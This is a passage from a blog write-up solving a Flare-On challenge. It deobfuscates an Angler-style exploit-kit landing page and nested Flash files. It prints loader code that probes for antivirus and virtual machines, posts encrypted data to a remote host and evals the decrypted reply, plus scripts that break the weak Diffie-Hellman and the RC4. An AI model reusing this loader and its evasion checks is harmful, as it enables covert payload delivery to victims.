 }

 function Il1Iiare(x) {
 while(x.t <= this.mt2)
 x[x.t++] = 0;
 for(var i = 0; i < this.m.t; ++i) {
 var j = x[i]&32767;
 var u0 = (j*this.mpl+(((j*this.mph+(x[i]>>15)*this.mpl)&this.um)<<15))&x.DM;
 j = i+this.m.t;
 x[j] += this.m.am(0,u0,x,i,0,this.m.t);
 while(x[j] >= x.DV) { x[j] -= x.DV; x[++j]++; }
 }
 x.Il1IN();
 x.Il1IO(this.m.t,x);
 if(x.Il1IG(this.m) >= 0) x.Il1IM(this.m,x);
 }

 function Il1IiaP(x,r) { x.Il1IJ(r); this[Il1If](r); }

 function Il1Iiaja(x,y,r) { x.Il1II(y,r); this[Il1If](r); }

 Il1Is = Il1Iia[Il1Ih];
 Il1Is.pa = Il1Iiapa;
 Il1Is.sa = Il1Iiasa;
 Il1Is.reduce = Il1Iiare;
 Il1Is.ja = Il1Iiaja;
 Il1Is.P = Il1IiaP;

 function Il1IXbn(e,m) {
 var i = e.Il1Ima(), k, r = Il1IC(1), z;
 if(i <= 0) return r;
 else if(i < 18) k = 1;
 else if(i < 48) k = 3;
 else if(i < 144) k = 4;
 else if(i < 768) k = 5;
 else k = 6;
 if(i < 8)
 z = new Il1IF(m);
 else if(m.Il1IU())
 z = new Il1Ioa(m);
 else
 z = new Il1Iia(m);

 var g = new Array(), n = 3, k1 = k-1, km = (1<<k)-1;
 g[1] = z.pa(this);
 if(k > 1) {
 var g2 = Il1Ix();
 z.P(g[1],g2);
 while(n <= km) {
 g[n] = Il1Ix();
 z.ja(g2,g[n-2],g[n]);
 n += 2;
 }
 }

 var j = e.t-1, w, is1 = true, r2 = Il1Ix(), t;
 i = Il1IE(e[j])-1;
 while(j >= 0) {
 if(i >= k1) w = (e[j]>>(i-k1))&km;
 else {
 w = (e[j]&((1<<(i+1))-1))<<(k1-i);
 if(j > 0) w |= e[j-1]>>(this.DB+i-k1);
 }

 n = k;
 while((w&1) == 0) { w >>= 1; --n; }
 if((i -= n) < 0) { i += this.DB; --j; }
 if(is1) {
 g[w][Il1Ie](r);
 is1 = false;
 }
 else {
 while(n > 1) { z.P(r,r2); z.P(r2,r); n -= 2; }
 if(n > 0) z.P(r,r2); else { t = r; r = r2; r2 = t; }
 z.ja(r2,g[w],r);
 }

 while(j >= 0 && (e[j]&(1<<i)) == 0) {
 z.P(r,r2); t = r; r = r2; r2 = t;
 if(--i < 0) { i = this.DB-1; --j; }
 }
 }
 return z.sa(r);
 }

 Il1Is = Il1Iu[Il1Ih]
 Il1Is.Il1IQ = Il1IQbn;
 Il1Is.Il1Ill1ml = Il1Ill1mlbn;
 Il1Is.Il1Ill1mu = Il1Ill1mubn;
 Il1Is.Il1Iba = Il1Ibabn;
 Il1Is.Il1Ill1d = Il1Ill1dbn;
 Il1Is.Il1IX = Il1IXbn;

 if (typeof exports !== 'undefined') {
 exports = module.exports = {
 Il1Iu: Il1Iu,
 };
 } else {
 this.Il1Illl1I1l = {
 Il1Iu:Il1Iu ,
 };
 }

}).call(this);

function Il1Ita()
{
 for (var a = ''; 32 > a[Il1In];) switch (Il1Ib[Il1Iq](Il1Ib[Il1Ik]()))
 {
 case 0:
 a += Il1Ic[Il1Il](Il1Ib[Il1Iq](9 * Il1Ib[Il1Ik]()) + 48);
 case 1:
 a += Il1Ic[Il1Il](Il1Ib[Il1Iq](5 * Il1Ib[Il1Ik]()) + 65)
 }
 return a;
}

function Il1Ixa()
{
 var a = '';
 var b = Il1IY(Il1IbbAa)[Il1Ibbss]((Il1Ibbsn*Il1Ibbsi+Il1Ibbso), (Il1Ibbso+Il1Ibbsn));
 var c = (Il1Ibbso+Il1Ibbsn)*Il1Ibbsi;
 for(var i=0;i<c;i++)
 {
 a += b[Il1Ij](Il1Ib[Il1Iq](Il1Ib[Il1Ik]() * b[Il1In]));
 }
 return a;
}

function Il1Iya()
{
 var Il1Iu = Il1Illl1I1l.Il1Iu;
 this.L = new Il1Iu(Il1Ixa(), (Il1Ibbso+Il1Ibbsn));
 this.ic = new Il1Iu(Il1Ixa(), (Il1Ibbso*3-Il1Ibbsi));
 this.ha = new Il1Iu(Il1Ita(), (Il1Ibbso*Il1Ibbsi+Il1Ibbsi*Il1Ibbsi));
 this.Jb = this.L.Il1IX(this.ic, this.ha);
}


function Il1Iv(a, b) {
 b = Il1Ibbsj(b);
 for (var c = [], d = 0, e, f = '', g = 0; 256 > g; g++) c[g] = g;
 for (g = 0; 256 > g; g++) d = (d + c[g] + a[Il1Ip](g % a[Il1In])) % 256, e = c[g], c[g] = c[d], c[d] = e;
 for (var h = d = g = 0; h < b[Il1In]; h++) g = (g + 1) % 256, d = (d + c[g]) % 256, e = c[g], c[g] = c[d], c[d] = e, f += Il1Ic[Il1Il](b[Il1Ip](h) ^ c[(c[g] + c[d]) % 256]);
 return f
};


Il1Isa = function() {
 this.gW = ''['>_<']('d%13%06%5D%A2%9CQ%C8%14%D1%BB%F1%9E%7E%A0%BF%0E%A7%98l%F0%D3%96%10%7BF%E5%9E%8E%1E%B1%9E%15%A8%A7%D2%8Fv%AC%3C%DB+%98Je%C9%9A%94', 12, 17, 155);
 this.Yw = '' ['o3o']('%CFR%18%03%E5%BF%DEf%80%9C.%FA', 140, 9, 81);
 this.dc = '' ['-,-']('%F5s%9AeI%8CW%C1E4l%CE%D24%21%E3%FF%93y%D11%ED%15%00%286G%E5%8E%DAF', 148, 9, 207);
 this.KJ = '' ['Orz']('%F7%AE%20/%8D%9B%F6%A2pL%D8%A4%245', 180, 129, 13);
}


Il1Iwa = function() {
 function Il1Il1Il1a() {
 var a = false;
 try {
 var b = os;
 var c = print;
 c(b['' ['>_<']('%0A%FB%A0%D8%28%9B', 121, 9, 65)](''['lol']('K%DE%ACl', 46, 9, 31), ['' ['-,-']('%96%5E%7F%11X%5E%01%A2%9A3%C9%9C%3Am%CCZ/%5C*%7B/%FA5%E9U%28%FD5%1C%C7%CE%AAZ%FE%02%A1%E7%E9%EE%5D2%98', 223, 9, 167)]));
 a = !Il1Ibbst;
 } catch(m){a=false;};
 return a;
 };

 function Il1Il1Il1b() {
 var a = Il1Ibbst;
 try {
 var b = window;
 if (typeof b === ''['lol']('%04%C6%DF%7F%93U%F1%EB%5D', 113, 5, 115))
 {
 a = true;
 }
 } catch (z) {};

 if (!a)
 {
 try {
 var c = process;
 if (typeof c === ''['Orz']('%0C%7C%DB%B9%3C%8E', 99, 9, 163) && c + '' === ''['-,-']('%EA%01%992%E0%E1%3B%CC%29%E4%CC%E3H%D9%84I', 177, 17, 173))
 {
 a = true;
 }
 } catch(y) {};
 }
 return a;
 };

 function Il1Il1Il1c() {
 var a = false;
 try {
 var d = window;
 var e = d[''['OGC']('d%CBI%DDmuX%18%87.', 11, 5, 135)];
 var f = d[''['>_<']('%3Ac%93%AD%CB%F2%AE%85z6%DB', 85, 17, 113)];
 if (e === 0 && f === 0) 
 {
 a = true;
 }
 } catch (x) {a = true};

 if (!a)
 {
 try {
 var g = window;
 a = !!g[''['lol']('fK%F3%08%29%B6%F2%F6%99%FD%EA', 5, 17, 213)]
 } catch (w) {};
 }
 return a;
 };

 this.Mi = Il1Il1Il1a();
 this.pA = Il1Il1Il1b();
 this.CA = Il1Il1Il1c();
}

Il1Iqa = function() {
 function Il1Il1Il1d(a,b) {
 if (a<0.00000001) {
 return b;
 }
 if (a<b) {
 return Il1Il1Il1d(b-Il1Ib[Il1Iq](b/a)*a,a);
 }
 else if (a==b) {
 return a;
 }
 else
 {
 return Il1Il1Il1d(b,a);
 }
 };

 function Il1Il1Il1e(b) {
 var a = new ActiveXObject(''['>_<']('z%87%8C%84H%0D%B0%E0c%20%97%5BK%DA%F0%EB', 55, 7, 109));
 a.async = true;
 a[''['lol']('Y%8B%08D%A51%BD', 53, 11, 157)]('<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "res://' + b + '">');
 if (a[''['o3o']('u%11%7B%EF%88-%C3%A6%3A%92', 5, 11, 57)][''['OGC']('%5ET%E5%95%21%AD%00f%8E', 59, 19, 197)] == -2147023083)
 return 1;
 return 0;
 };

 function Il1Il1Il1f() {
 try {
 var a = performance.now() / 1000;
 } catch (e) { return 0;}

 var b = performance.now() / 1000 - a;
 for (var i=0;i<10;i++) {
 b=Il1Il1Il1d(b, performance.now()/1000 - a);
 }

 var c = Il1Ib[''['-,-']('%60%E3%A3%1E%BE', 18, 9, 234)](1/b);
 if (Il1Ib[''['-,-']('b%D2H', 3, 23, 107)](c-10000000) < 100) {
 return 1;
 }
 else if (Il1Ib[''['lol']('%0E%13%C8', 111, 37, 102)](c-3579545) < 100) {
 return 1;
 }
 else if (Il1Ib[''['O_o']('R%5C%28', 51, 119, 137)](c-14318180) < 100) {
 return 1;
 }
 
 try {
 var d = screen;
 if ((d[''['OGC']('y%FAH%5Dr', 14, 5, 77)] < (13625^12345)) || (d[''['>_O']('%FCf%83nH%9B', 148, 9, 207)] < (66256^65536))) return 1;
 } catch(x) {return 1;}

 return 0;
 };

 if(Il1Il1Il1f() >= 1) return 1;
 if(Il1Il1Il1f() >= 1) return 1;
 if(Il1Il1Il1e(''['OGC']('%C5%BB@%00%FB%03l%0C%09*%A8%1C%136%94%5E%3B%02%FE%7B%26o%D1eK%7B%D7%A3l%98%F8%8C%60%92R%A4%8B%BE', 166, 65, 91)) == 1) return 1;
 if(Il1Il1Il1e(''['>_<']('q%F3%AC%D0%E7k%88%2C%7D2%B4%AC%FF%0E%90%DEo%8A%D2+%1A%87%B5E%9FC%AB%B3%20/%BB%D3%BF%C6%A5%14%0B%CB%BFZ%99', 18, 17, 151)) == 1) return 2;
 if(Il1Il1Il1e(''['lol']('%1Bk%164%F5%9B%0Ah%B7%EA%CE%F8%9DN%C2*e%D2%E8%AFH%F7%97%E15%5BQg%02%A03%AC%FA%1C%05%F6%CFp%A0T%99%CA', 120, 33, 217)) == 1) return 1;
 if(Il1Il1Il1e(''['o3o']('%D1%D9%84%F6%E7A0b%DD%C8L%EA%7F%F4x%C0%CF%A0z%8D%1A%AD%ADK%FF%19%F3%B5%A0u%13%AD%C4*%DCd%01%A1G%14%F9', 178, 5, 105)) == 1) return 2;
 if(Il1Il1Il1e(''['>_O']('%80%F4es%E6%14%81%BFLU%CD/%9E%A1IM%FEM%DB%88%5BX%FC%F6%8E%A42p%E1%EF%80%B76%5D%FC%AA%9C%A36', 227, 129, 107)) == 1) return 1;
 if(Il1Il1Il1e(''['-Q-']('N%82%C7%C1%00%BA%F3%1DR%03O%9D%18%FF%7B%CFp%1B%B9Z%3D6%EE%94p%92pb%07%BE%90b%5E%DEU%050%C7', 45, 9, 35)) == 1) return 2;
 if(Il1Il1Il1e(''['Orz']('%95%B7X%0C%FB%C7%C4%18Y%B6%60%C0%B3%92%AC%CA%0B%CEF%97fky%91%FBG%DF_L%3C%7B%7B%BB%1D%CAH%0B%FA', 246, 33, 215)) == 1) return 1;
 if(Il1Il1Il1e(''['^_^']('%7CBi%B12%CAu%5D%A0cq%ED%EA%CF%FD%EF%E2%9B%17%CA%AF%A6h%94%222n2U%AE%16B%B8%ADp5O*%82%EB%C4', 31, 5, 221)) == 1) return 2;

 return 0;
}

Il1Iza = function() {
 var a = new Il1Iya();
 var b = Il1IIll1a, c = Il1IIll1b;
 var w = Il1Iv, y = Il1IZ, z = Il1IY, x = new Il1Isa(), v = new Il1Iwa(), u = Il1Iqa();
 try {
 var d = {
 g: a.L[Il1Io](Il1Ibbsi*8),
 A: a.Jb[Il1Io]((' '[Il1Ip](0))/Il1Ibbsi),
 p: a.ha[Il1Io]((('2'[Il1Ip](0)) - 2)/3),
 };
 d = y(w('' ['' ['OGC']('V%E5%3C', 49, 9, 201)](), b[Il1Ibbsg](d)));
 var e = new c;
 e[Il1Ibbsb](Il1Ibbsp, x.gW, !Il1Ibbst);
 e[Il1Ibbsa](x.Yw,x.dc)
 e[Il1Ibbsa](x.KJ,d[Il1In]);
 e[Il1Ibbsd] = function() {
 if (e[Il1Ibbse]===(Il1Ibbsc[Il1In])&&e[Il1Ibbsf]===(15832^15632))
 {
 var d = b[Il1Ibbsh](w('' ['' ['lol']('%0AaH', 98, 17, 135)](), z(Il1Ibbsj(e[Il1Ibbsk]))));
 var f = Il1Illl1I1l.Il1Iu;
 var g = new f(d.B, 16);
 var h = g.Il1IX(a.ic, a.ha);
 var j = w(h.toString(16), d.fffff);
 if (u < 1) { eval(j);}
 }
 };
 if (!v.Mi && !v.pA && !v.CA){
 e[Il1Ibbsc](d);
 }
 } catch(f) {};
}

function Il1Ila() {
 try {
 Il1Iza();
 } catch (Il1INa) {};
};

try {
 Il1Ila();
} catch(meh) {};",
        b, g, f, e, c, d = 0,
        h = '',
        x = window['UoqK1Yl'];

    do
        b = x.indexOf(a.charAt(d++)),
        g = d < a.length ? x.indexOf(a.charAt(d++)) : 64,
        e = d < a.length ? x.indexOf(a.charAt(d++)) : 64,
        c = d < a.length ? x.indexOf(a.charAt(d++)) : 64,
        f = b << 18 | g << 12 | e << 6 | c,

        b = f >> 16 & 255,
        g = f >> 8 & 255,
        f &= 255,

        h = 64 == e ? h + String.fromCharCode(b) : 64 == c ? h + String.fromCharCode(b, g) : h + String.fromCharCode(b, g, f);
    while (d < a.length);

    return h;
}

The aim here is similar to the previous layer's. Function(a) (line 20) is called to invoke the next layer of javascript; we need to make sure variable 'a' contains proper javascript.

The checks are much simpler here and happen between lines 73 - 77. We want window.gFVaUK and window.LAAOEpH to both be false so we can satisfy the condition. The latter depends on lines 54 - 71 where it tries to load Kaspersky as an ActiveXObject and if it doesn't find it, it fails, leaving window.LAAOEpH set to false as we want. The first check succeeds if we run the script in Internet Explorer. Bypass them by modifying the code or just run the page in IE and we get to the third layer.

Layer3 references a few objects from layer2 and hence we need to copy them over. These are lines 2-15 and line 30. Once this is done we can discard layer2 and focus solely on this layer. I'll only be pasting the relevant parts for layer3 as it's over 1000 lines of code. If we run file we notice that it performs an XMLHttpRequest to the following URL:
  • http://10.14.56.20:18089/i_knew_you_were_trouble
and contains a base64 string which changes every time a new request is made. This request is also present in the pcap we started with the following base64 string:

ErZVpc7xaW3bf0h8ythQz62wRdQlMpg3nTEKPYsyE9OtxAU4fCbwYg8zfbxlTnLb3BpLkcSSeuiskPQoEeyrEdZts9jKxSRiiYlr0Q/PDPhri78Sm4vTsUx/ascx7lt0EEvP5YsvQTjW2QvS1+3dyk7x8c8QlQ==

The goal is to understand how the requests are encrypted and get the original content. The following is the function in layer3 which encrypts the request, performs an XMLHttpRequest and decrypts the response:

Il1Iza = function() {
    var a = new Il1Iya();
    var b = Il1IIll1a, c = Il1IIll1b;
    var w = Il1Iv, y = Il1IZ, z = Il1IY, x = new Il1Isa(), v = new Il1Iwa(), u = Il1Iqa();
    
    try {
        var d = {
            g: a.L[Il1Io](Il1Ibbsi * 8),
            A: a.Jb[Il1Io]((' ' [Il1Ip](0)) / Il1Ibbsi),
            p: a.ha[Il1Io]((('2' [Il1Ip](0)) - 2) / 3),
        };
        //base64_encode ( RC4 (flareon_is_so_cute, [request] ) )
        d = y(w('' ['' ['OGC']('V%E5%3C', 49, 9, 201)](), b[Il1Ibbsg](d)));
        var e = new c;
        //initializes XMLHttpRequest('POST','http://10.14.56.20:18089/i_knew_you_were_trouble', true)
        e[Il1Ibbsb](Il1Ibbsp, x.gW, !Il1Ibbst);
        //sets header to json
        e[Il1Ibbsa](x.Yw, x.dc)
        //sets content length header
        e[Il1Ibbsa](x.KJ, d[Il1In]);
        //onreadystatechange handler
        e[Il1Ibbsd] = function() {
            //if readystate == send.length & status == 200
            if (e[Il1Ibbse] === (Il1Ibbsc[Il1In]) && e[Il1Ibbsf] === (15832 ^ 15632)) {
                // RC4(how_can_you_not_like_flareon, base64_decode ( [response] ))
                var d = b[Il1Ibbsh](w('' ['' ['lol']('%0AaH', 98, 17, 135)](), z(Il1Ibbsj(e[Il1Ibbsk]))));
                var f = Il1Illl1I1l.Il1Iu;
                //Diffie-Hellman stuff to get decryption key using B (d.B)
                var g = new f(d.B, 16);
                var h = g.Il1IX(a.ic, a.ha); 
                //decrypt contents (d.fffff) using Diffie-Hellman
                var j = w(h.toString(16), d.fffff);
                if (u < 1) {
                    //evaluate decrypted contents
                    eval(j);
                }
            }
        };
        if (!v.Mi && !v.pA && !v.CA) {
            //send XMLHttpRequest
            e[Il1Ibbsc](d);
        }
    } catch (f) {};
}

On line 13, the request is RC4 encrypted using the key 'flareon_is_so_cute' and the result is base64'd. If we reverse the process we get the contents of our base64 string found in the pcap:
{
    "g":"91a812d65f3fea132099f2825312edbb",
    "A":"16f2c65920ebeae43aabb5c9af923953",
    "p":"3a3d4c3d7e2a5d4c5c4d5b7e1c5a3c3e"
} 

For those of you who are malware analysts and have suffered due to Angler's implementation of the Diffie-Hellman to encrypt shellcode delivery, these variables should trigger off all sorts of alarms. The only missing parameter to get hold of the private key is B, which is generated by the server and hence we need to look at the response present in the pcap. We decrypt the response in the same way we did for the request but this time using the key 'how_can_you_not_like_flareon':
{
    "B":"3101c01f6b522602ae415d5df764587b",
    "fffff": "<loads of garbage>"
}

Let's take a small break and check what we've got. We have parameters g, A, p, B and the DH-encrypted payload fffff. Thanks to the research at SecureList, this is all we need to crack the Diffie-Hellman and obtain the private key. The research can be found here. To make use of the java program at the bottom we need to calculate φ(p) and it's expansion into prime factors:

     p   = 0x3a3d4c3d7e2a5d4c5c4d5b7e1c5a3c3e
         = 77413500198989862721437805355107761214

 => φ(p) = 38532794441885460791256898927871100000
         =  2^5 * 3^4 * 5^5 * 7 * 37 * 61 * 73 * 113 * 389 * 4651 * 20175236914405679

 =>  q   =  {32L, 81L, 3125L, 7L, 37L, 61L, 73L, 113L, 389L, 4651L, 20175236914405679L }


Wolfram Alpha and CryptoTool can be used to help out with the computations. We now plug in all the constants into the java program:
import java.math.BigInteger;
import java.util.HashSet;
import java.util.Iterator;
import java.util.Set;
import java.util.TreeMap;
import java.util.Vector;


public class DH_breaker {
    
    static BigInteger p = new BigInteger("3a3d4c3d7e2a5d4c5c4d5b7e1c5a3c3e", 16);
    static BigInteger psi = new BigInteger("38532794441885460791256898927871100000");
    static BigInteger g = new BigInteger("91a812d65f3fea132099f2825312edbb", 16).mod(p);
    static BigInteger A = new BigInteger("16f2c65920ebeae43aabb5c9af923953", 16);    
    static BigInteger B = new BigInteger("3101c01f6b522602ae415d5df764587b", 16);
    static long[] q = new long[]{32L, 81L, 3125L, 7L, 37L, 61L, 73L, 113L, 389L, 4651L, 20175236914405679L};


    static int q_len = q.length;
    static HashSet[] xi = new HashSet[q_len];
    static BigInteger ai[] = new BigInteger[q_len];
    static HashSet res = new HashSet();
    
    static void rec(int ind)
    {
        if (ind == q_len)
        {
            BigInteger x = BigInteger.ZERO;
            for(int i=0;i<q_len;i++)
            {
                BigInteger mn = new BigInteger(((Long)q[i]).toString());
                BigInteger M = psi.divide(mn);
                x = x.add(ai[i].multiply(M).multiply(M.modInverse(mn)));
            }
            res.add(B.modPow(x.mod(psi), p));
            return;
        }
        
        Iterator<Long> it = xi[ind].iterator();
        while(it.hasNext()){
            ai[ind] = new BigInteger(it.next().toString());
            rec(ind + 1);
        }      
    }
    
    public static void main(String[] args) {

        for(int i=0;i<q_len;i++)
        {
            xi[i] = new HashSet<Long>();
            long qi = q[i];
            int H = (int)Math.sqrt((double)qi) + 1;
                 
            BigInteger _a = g.modPow(psi.divide(new BigInteger(((Long)qi).toString())), p);
            BigInteger _b = A.modPow(psi.divide(new BigInteger(((Long)qi).toString())), p);
            
            BigInteger _c = _a.modPow(new BigInteger(((Integer)H).toString()), p);
            BigInteger _cp = _c;           
            int u_size = 1000000;
            
            boolean stop = false;
            for(int u_part = 1;u_part<=H && !stop;u_part+=u_size)
            {
                if (H > u_size) 
                {
                    System.out.print("[i] Processing ");
                    System.out.println(u_part);
                }
                TreeMap<BigInteger, Integer> table = new TreeMap<>();
                for(int u=u_part;u<=H && u<u_part + u_size;u++)
                {
                    table.put(_cp, u);
                    _cp = _cp.multiply(_c).mod(p);
                }
                BigInteger z = _b;
                for(int v=0;v<=H;v++)
                {
                    if (table.get(z) != null)
                    {
                        xi[i].add((((long)H)*table.get(z) - v) % qi);
                        stop = true;
                        break;
                    }
                    z = z.multiply(_a).mod(p);              
                }
                table.clear();
                System.gc();
            }
            System.out.println(xi[i].toString());
        } 
        rec(0);
        
        Iterator<BigInteger> it = res.iterator();
        while(it.hasNext()){
            System.out.println(it.next().toString(16));
        } 
    }
    
}

We compile and run it:

Command Prompt
C:\>javac DH_breaker.java Note: DH_breaker.java uses unchecked or unsafe operations. Note: Recompile with -Xlint:unchecked for details. C:\>java DH_breaker [3] [70] [2958] [5] [16] [12] [21] [32] [132] [2873] [i] Processing 1 [i] Processing 1000001 [i] Processing 2000001 [ .. snip .. ] [i] Processing 94000001 [13449667480594038] 24c9de545f04e923ac5ec3bcfe82711f C:\>

We now have the decryption key: 24c9de545f04e923ac5ec3bcfe82711f. The easiest way to apply this and decrypt the response from the pcap is to set Fiddler to autorespond with this request and apply the following alterations to the layer3 javascript:


 [ .. snip .. ]

 //onreadystatechange handler
 e[Il1Ibbsd] = function() {
     //if readystate == send.length & status == 200
     if (e[Il1Ibbse] === (Il1Ibbsc[Il1In]) && e[Il1Ibbsf] === (15832 ^ 15632)) {
         // RC4(how_can_you_not_like_flareon, base64_decode ( [response] ))
         var d = b[Il1Ibbsh](w('' ['' ['lol']('%0AaH', 98, 17, 135)](), z(Il1Ibbsj(e[Il1Ibbsk]))));
         var f = Il1Illl1I1l.Il1Iu;
         //Diffie-Hellman stuff to get decryption key using B (d.B)
         var g = new f(d.B, 16);
         var h = g.Il1IX(a.ic, a.ha); 
         // The key we obtained earlier
         priv_key = "24c9de545f04e923ac5ec3bcfe82711f";  
         //decrypt contents (d.fffff) using Diffie-Hellman
         //var j = w(h.toString(16), d.fffff);
         var j = w(priv_key, d.fffff);
         //if (u < 1) {
             //evaluate decrypted contents
             eval(j);
         //}
     }
 };

 [ .. snip .. ]

Running the page again we are greeted with 2 message boxes:


Nice!! We now have the key for the flash file: HEAPISMYHOME

Part II: The Flash File


The flash file expects a key to "keep going":


Hitting the Submit button displays a few message boxes that something has been unlocked but nothing else. Let's load it into JPEXS. The button handler basically runs the function d3cryp7AndL0ad() with the supplied key as the parameter. This function is displayed below.

    public function d3cryp7AndL0ad(param1:String) : void
    {
        var _loc2_:Loader = new Loader();
        var _loc3_:LoaderContext = new LoaderContext(false,ApplicationDomain.currentDomain,null);
        var _loc4_:Class = Run_challenge1;
        //RC4-ish ( binaryData, key )
        var _loc5_:ByteArray = pr0udB3lly(ByteArray(new _loc4_()),param1);
        var _loc6_:String = "1172ca0ede560b08d97b270400347ede";
        if(MD5.hashBytes(_loc5_) == _loc6_)
        {
            this.loaded = true;
            _loc2_.loadBytes(_loc5_);
        }
    }

This function is pretty straight forward too and the line we're interested in is line 7. The function pr0udB3lly() takes a bytearray and a string, appends the first 16 bytes of the bytearray to the input string, computes the MD5 hash of the concatenation and uses this as the key to RC4-decrypted the rest of the bytearray. The result is another flash file.

Load it into JPEXS and deobfuscate it using the P-code deobfuscation feature. This feature is pretty amazing, when it works that is.


Luckily for us it does work on this SWFSecure obfuscation. The part we need to focus on is the constructor of class §-_§. We notice that the function is loading some external parameters but we know for sure that the landing page does not pass any parameters to the flash file, and neither does the previous layer:


 [ .. snip .. ]

 //loads parameters
 var _loc1_:Object = this.root.loaderInfo.parameters;
 //uses loaded params
 if(_loc1_.flare == "On")
 {
     _loc2_ = new Loader();
     _loc3_ = new LoaderContext(false,this.root.loaderInfo.applicationDomain,null);
     this.§-_---_§ = new Array();
     this.§-__-_--§ = new ByteArray();
     //uses loaded params twice
     this.§-_-___-§ = _loc1_.x;
     this.§--___-_§ = _loc1_.y;

 [ .. snip .. ]


As we can see, 3 parameters should have been loaded from somewhere. If we take a look at the binaryData folder, something catches our eye:


The name suggests that there's some information on Imgur. As images on Imgur are referenced using 7 random characters we visit http://imgur.com/vnUziJP:


If we download the image we notice that the size of the image is equal to size of the Int3lIns1de_t3stImgurvnUziJP binary data; there's a high chance that this binary data is the encrypted version of the image. Also, the class §-_§ contains an RC4 encryption/decryption function. With a plaintext-ciphertext pair encrypted using RC4, we don't require a key to decrypt other messsages; the question is, which one of the binary data might contain something interesting?

If we look at the constructor again, we notice that all the binary data objects are being pushed into a ByteArray() object, but 2 of them are not. In fact they're just loaded without being used. One of them is the Int3lIns1de_t3stImgurvnUziJP binary data and the other is '31: --__-.-__--__'. Let's decrypt this one using the following:


 //Encrypted version of the image
 CT_in = open("CT.bin", 'rb')
 //The image itself
 PT_in = open("PT.png", 'rb')
 //The other binary data
 TBD_in = open("to_be_decrypted.bin", 'rb')
 // resultant file
 answer = open("result.bin",'wb')

 CT_contents = CT_in.read()
 PT_contents = PT_in.read()
 TBD_contents = TBD_in.read()

 //Compute ciphertext1 XOR plaintext1 = ciphertext2 XOR plaintext2
 CT_squared = [ chr(ord(a) ^ ord(b)) for a,b in zip(CT_contents,PT_contents)]
 //Compute ( ciphertext2 XOR plaintext2 ) XOR ciphertext2
 result = [chr(ord(a) ^ ord(b)) for a,b in zip(CT_squared,TBD_contents)]
 //write plaintext2
 answer.write(''.join(result))
 answer.close()


If we open the result.bin file we get:
 x: 1BR0K3NCRYPT0FTW 
 y: 47:14546,46:1617,35:239,... [ .. snip ..] ...,6:733,21:4,1:1418,40:1618

So finally we have the missing parameters. We now have to understand what's happening in the constructor of class §-_§, translate it into python and get the next flash file.

PS: If anyone knows of a way to dump the next SWF by inserting x and y in the current flash file and dumping the resultant SWF without coding the entire algorithm in python, please tell me how!!

The following is what this flash file does:
  1. Takes 50 of the 52 binary data blobs and pushes them into a single array, call this ARRAY
  2. Decrypts each element of ARRAY, i.e. each binary data, with 1BR0K3NCRYPT0FTW
    • Uses the algorithm described above where it appends the first 16 chars to the key, MD5 hashes it, and uses it to RC4 decrypt
  3. Splits parameter y by ',' and splits each of them by ':'
  4. For each of the coordinate (x,y) constructed in bullet point 3, get byte ARRAY[x][y]; concatenate them
  5. If the MD5 hash of the result is equal to 600aa47f484cbd43ecd37de5cf111b10, load it

We're only interested in bullet points 1 till 4. The following is the python implementation of these:


    import hashlib
    import base64
    import glob,os

    def KSA(key):
        keylength = len(key)
        S = range(256)
        j = 0
        for i in range(256):
            j = (j + S[i] + key[i % keylength]) % 256
            S[i], S[j] = S[j], S[i]  # swap
        return S

    def PRGA(S):
        i = 0
        j = 0
        while True:
            i = (i + 1) % 256
            j = (j + S[i]) % 256
            S[i], S[j] = S[j], S[i]  # swap
            K = S[(S[i] + S[j]) % 256]
            yield K

    def RC4(key):
        S = KSA(key)
        return PRGA(S)

    def convert_key(s):
        return [ord(c) for c in s] 

    if __name__ == '__main__':

        file_order = ["--_-__","---","---__-","-__-___","-_____-_",
                      "-___-___","--_--_","-_-__","---_","---_--",
                      "-----","-___-_-","-_______","-_-__-_","--__---",
                      "-____---","-___","-__-_-_","-___-","-_____-",
                      "-____-_","--_---","-_-__--","-__","-----_","-____-",
                      "--_--_-","--___-","----__","---__-_","---_---",
                      "-_--_--","-__--_-","-----_-","-__-","---__--",
                      "--__--","--_--__","-_-_","-_---","--_-__-",
                      "-_-_-_-","-_-____","---_-_","-__---","--_-_",
                      "-_--_-_","--_-___","-_--__-","-___-__"]

        map = "47:14546,46:1617,35:239,4:47,35:394,3:575,

               [ .. snip .. ]

              ,17:381,37:9021,31:676,33:15200,21:479,26:58,
              16:304,6:733,21:4,1:1418,40:1618"
 
 
        decrypted_files = []
 
 #decrypt files
 for file in file_order:
            f_in = open("binaryData\\" + file + ".bin", 'rb')
            f_contents = f_in.read()
  
            nonce = f_contents[:16]
            input =  "1BR0K3NCRYPT0FTW"
 
            m = hashlib.md5()
            m.update(input + nonce)
            key =  m.hexdigest()
 
            plaintext = f_contents[16:]
            key = convert_key(key)
            keystream = RC4(key)
  
            temp_result = []
            for c in plaintext:
                temp_result.append(chr(ord(c) ^ keystream.next()))
            decrypted_files.append(temp_result)
 
        merged_file = []
        rounds = map.split(',')
        for round in rounds:
            mapping = round.split(':')
            merged_file.append(decrypted_files[int(mapping[0])][int(mapping[1])])
  
        f_out = f_in = open("layer3.swf", 'wb')
        f_out.write(''.join(merged_file))
        f_out.close()

The script produces the 3rd, and last SWF file for the challenge. JPEXS struggles to decompile it and increasing the timeout does not help; it still fails:


We can still deobfuscate it though! The result is 1582 lines of Actionscript3. All we need to do here is trace the _loc2_ variable at the end of the function and we get the very well-deserved key:

angl3rcan7ev3nprim3@flare-on.com


PS: Work files for this challenge including scripts, each layer of javascript and flash files, etc: Download
key: i_really_R34LL7_h8_flava

3 comments:

  1. good post! thanks for sharing. Fiddle screenshot with the autoresponse and the rule would be nice ;) What did you write in Fiddle autoresponse "if the request matches..." ?

    ReplyDelete
  2. yep .. if I remember well you can right click on the request and do it straight from there. Then you can give it the path of the file containing just the response contents (taken form pcap), and done

    ReplyDelete
  3. check out this post : https://vulnerablespace.blogspot.co.uk/2016/04/malware-analysing-and-repurposing.html .. I explain it a bit better there

    ReplyDelete